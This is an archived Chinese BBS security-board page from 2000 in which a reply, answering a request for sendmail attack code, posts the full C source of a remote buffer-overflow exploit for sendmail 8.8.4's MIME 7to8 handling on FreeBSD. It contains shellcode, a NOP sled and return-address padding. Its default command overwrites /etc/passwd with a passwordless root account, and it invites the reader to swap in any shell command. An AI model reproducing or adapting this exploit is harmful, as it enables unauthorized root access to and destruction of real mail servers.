386.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="387.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦！！！), 信区: Security <br>
标  题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>
发信站: BBS 水木清华站 (Sat Aug  5 09:01:47 2000) <br>
  <br>
/* <br>
  sendmail 8.8.4, freebsd, mime 7to8, remote <br>
  I checked this only at home, at custom installed 8.8.4. <br>
  I have no freebsd with preinstaled 8.8.4 around. <br>
  change cmd[] below to shell command you want, and throw output to sendmail <br>
  <br>
 */ <br>
#include <stdlib.h> <br>
#include <fcntl.h> <br>
#define BUFSIZE 6100 <br>
#define OFFS -5000 <br>
#define ALIGN 0 <br>
#define ADDRS 15 <br>
int get_sp(void) { <br>
/* __asm__(" movl       %esp,%eax"); */ <br>
  return 0xefbf95e4; <br>
} <br>
/* up to 220 bytes */ <br>
char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'"; <br>

char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89" <br>
          "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46" <br>
          "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17" <br>
          "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b" <br>
          "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff" <br>
          "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02" <br>
          "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73" <br>
          "\x68\x2e\x2d\x63\x2e"; <br>
char nop[]="\x90"; <br>
char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123 <br>
456789+/"; <br>
void run(unsigned char *buf) { <br>
  unsigned int i, j, k; <br>
  printf("MIME-Version: 1.0\n"); <br>
  printf("Content-Type: text/plain\n"); <br>
  printf("Content-Transfer-Encoding: base64\n"); <br>
  k=strlen(buf) / 3 * 3; <br>
  for (i=0; i < k; i+=3) { <br>
    j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2]; <br>
    if (i % 54 == 0) <br>
      printf("\n"); <br>
    printf("%c", Base64Table[(j & 0xfc0000) >> 18]); <br>

    printf("%c", Base64Table[(j & 0x03f000) >> 12]); <br>
    printf("%c", Base64Table[(j & 0x000fc0) >> 6]); <br>
    printf("%c", Base64Table[j & 0x00003f]); <br>
  } <br>
  switch (strlen(buf) - k) { <br>
    case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2], <br>
                   Base64Table[(buf[k] & 0x3) << 4]); <br>
        break; <br>
    case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2], <br>
                   Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4 <br>
)], <br>
                   Base64Table[(buf[k+1] & 0xf) << 2]); <br>
        break; <br>
    default: <br>
  } <br>
  printf("\n"); <br>
} <br>
char code[sizeof(asmcode) + sizeof(cmd)]; <br>
main(int argc, char *argv[]) { <br>
  char *buf, *ptr, addr[8]; <br>
  int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS; <br>
  int i, noplen=strlen(nop); <br>

  if (argc >1) bufsize=atoi(argv[1]); <br>
  if (argc >2) offs=atoi(argv[2]); <br>
  if (argc >3) addrs=atoi(argv[3]); <br>
  strcpy(code, asmcode); <br>
  strncat(code, cmd); <br>
  strncat(code, "."); <br>
  code[41]=0x1a+strlen(cmd)+1; <br>
  if (bufsize<strlen(code)) { <br>
    printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); <br>
    exit(1); <br>
  } <br>
  if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) { <br>
    printf("Can't malloc\n"); <br>
    exit(1); <br>
  } <br>
  *(int *)addr=get_sp()+offs; <br>
  printf("address - %p\n", *(int *)addr); <br>
  ptr=buf; <br>
  for (i=0; i<bufsize; i++) <br>
    *ptr++=nop[i % noplen]; <br>
  memcpy(ptr-strlen(code), code, strlen(code)); <br>
  for (i=0; i<addrs<<2; i++) <br>

    *ptr++=addr[i % sizeof(int)]; <br>
  *ptr=0; <br>
  printf("total buf len - %d\n", strlen(buf)); <br>
  run(buf); <br>
} <br>
/*                       www.hack.co.za                    */ <br>
  <br>
【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>
: 如题 <br>
  <br>
  <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="387.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>